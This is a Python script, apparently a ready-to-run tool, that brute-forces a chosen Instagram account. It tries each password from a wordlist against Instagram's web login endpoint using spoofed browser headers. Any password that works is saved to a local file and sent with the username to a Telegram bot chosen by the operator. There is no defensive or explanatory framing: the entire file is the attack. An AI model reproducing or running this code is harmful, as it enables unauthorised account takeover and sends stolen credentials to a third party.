from random import choice
from requests import post
from urllib.parse import quote
import requests
import user_agent
import os
import pyfiglet
import colorama
from user_agent import generate_user_agent
from time import sleep as wh
import json, requests ,uuid,random,base64
import time
import requests,time,datetime
time1 = time.localtime()
time2 = time.strftime('''%d/%m/%Y''')
now = datetime.datetime.now()
current_time = now.strftime("%I:%M:%S")
E = '\033[1;31m'
G = '\033[1;32m'
B = '\033[1;33m'
P = '\033[1;34m'
O = '\033[1;36m'
P = '\x1b[1;97m'
M = '\x1b[1;91m'
H = '\x1b[1;92m'
K = '\x1b[1;93m'
B = '\x1b[1;94m'
U = '\x1b[1;95m' 
O = '\x1b[1;96m'
N = '\x1b[0m'    
Z = "\033[1;30m"
sir = '\033[41m\x1b[1;97m'
x = '\33[m' # DEFAULT
m = '\x1b[1;91m' #RED +
k = '\033[93m' # KUNING +
h = '\x1b[1;92m' # HIJAU +
hh = '\033[32m' # HIJAU -
u = '\033[95m' # UNGU
kk = '\033[33m' # KUNING -
b = '\33[1;96m' # BIRU -
p = '\x1b[0;34m' # BIRU +
Goldid = input(f'{u} - Enter ID Telegram ==>    ')
print(f"{E}â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”")
Goldtok = input(f'{P} - Enter TOKEN Telegram ==>    ')
print(f"{kk}â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”")
Username_Golden = input(f'{K} - Enter Email/Username ==>    ')
print(f"{O}â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”")
file_Golden = input(f'{H} - Enter File password ==>    ')
print(f"{M}â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”")
def Golden():
    while True:
        for Golden in open(file_Golden, "r").read().splitlines():
            password_Golden = Golden.strip()

            headers = {
                'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0',
                'Accept': '*/*',
                'Accept-Language': 'ar,en-US;q=0.7,en;q=0.3',
                # 'Accept-Encoding': 'gzip, deflate, br',
                'X-CSRFToken': 'ouliAoSFAkO4AAl9hrVEPSQXgG1RqpqW',
                'X-Instagram-AJAX': '1012414091',
                'X-IG-App-ID': '936619743392459',
                'X-ASBD-ID': '129477',
                'X-IG-WWW-Claim': 'hmac.AR0B7i9i1Y5DYrc-YtG1No34bwsyj6BSo59bLMf6ONfx0aXu',
                'Content-Type': 'application/x-www-form-urlencoded',
                'X-Requested-With': 'XMLHttpRequest',
                'Origin': 'https://www.instagram.com',
                'Alt-Used': 'www.instagram.com',
                'Connection': 'keep-alive',
                'Referer': 'https://www.instagram.com/',
                # 'Cookie': 'mid=ZfF-DAALAAGXzBCiUAgi13rtL_5E; ig_did=FB9568FA-1ABD-406E-801A-1D1FEE4F914D; datr=DH7xZd9Mt6da9I87sxwJHzrm; ps_l=0; ps_n=0; ig_nrcb=1; csrftoken=ouliAoSFAkO4AAl9hrVEPSQXgG1RqpqW; ds_user_id=65386106016; rur="LDC\\05465386106016\\0541743274513:01f743a65e9965ef4cf008b1882e4670accce16569cf5cca3977ee1cbe5ca73c5017ae19"',
                'Sec-Fetch-Dest': 'empty',
                'Sec-Fetch-Mode': 'cors',
                'Sec-Fetch-Site': 'same-origin'}
            tim33 = str(time.time()).split('.')[0]
            data = {
                'enc_password': f'#PWD_INSTAGRAM_BROWSER:0:{tim33}:{password_Golden}',
                'optIntoOneTap': 'false',
                'queryParams': '{}',
                'trustedDeviceRecords': '{}',
                'username': Username_Golden}

            po = requests.post('https://www.instagram.com/api/v1/web/accounts/login/ajax/', headers=headers, data=data)
            if 'userId' in po.text:
                print(f'{G}Done ==> {Username_Golden} : {password_Golden}')
                idd=po.json()["userId"]
                Goldentele =(f"""
[ âœ… ] account ready 
â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•âž¢
[âœ…] ID   Â» {Username_Golden}

[âœ…] Password  Â» {password_Golden}

[âœ…] Time    Â» {current_time}

[âœ…] Date   Â» {time2}
â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•âž¢
[ðŸ¤´ðŸ»]  => @rrrrrf""")
                requests.post(f"https://api.telegram.org/bot{Goldtok}/sendMessage?chat_id={Goldid}&text="+str(Goldentele))
                with open('instagram_Golden.txt', 'a') as x:
                    x.write(Username_Golden + ":" + password_Golden + '\n')
            else:
                print(f'{E}ERROR ==> {Username_Golden} : {password_Golden}')

Golden()